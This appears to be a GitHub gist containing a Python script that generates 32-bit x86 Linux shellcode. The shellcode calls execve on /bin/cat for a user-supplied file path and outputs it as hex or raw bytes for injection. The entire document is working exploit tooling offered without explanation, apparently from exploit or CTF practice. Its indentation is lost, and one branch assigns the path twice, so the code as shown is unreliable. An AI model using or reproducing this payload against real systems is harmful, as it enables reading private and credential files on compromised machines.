Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python3
from argparse import ArgumentParser
import sys
from binascii import hexlify
parser=ArgumentParser()
parser.add_argument('path', help='path of file to read')
parser.add_argument('-r', '--raw', default=False, action='store_true', help='print raw bytes')
args = parser.parse_args()
l = len(args.path)
if args.path[0]=='/':
absolute = True
else:
absolute = False
to_fill = (4 - (l % 4)) %4
out = b''
if to_fill !=0:
if absolute:
path = '/' + args.path
if absolute:
path = '/./'[:to_fill] + args.path
else:
if to_fill == 1:
to_fill = 5
path = '././'[:to_fill -1] + '/' + args.path
else:
path = args.path.rstrip()
while path:
try:
out += b'h' + path[-4:].encode("ascii")
except:
print("ascii encode failed")
exit(1)
path = path[:-4]
pre = b"\x31\xc0"+ \
b"\x99"+ \
b"\x52"+ \
b"\x68\x2f\x63\x61\x74"+ \
b"\x68\x2f\x62\x69\x6e"+ \
b"\x89\xe3"+ \
b"\x52"
post = b"\x89\xe1"+ \
b"\xb0\x0b"+ \
b"\x52"+ \
b"\x51"+ \
b"\x53"+ \
b"\x89\xe1"+ \
b"\xcd\x80"
payload = pre + out + post
if args.raw:
sys.stdout.buffer.write(payload)
else:
print(hexlify(payload).decode("ascii"))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment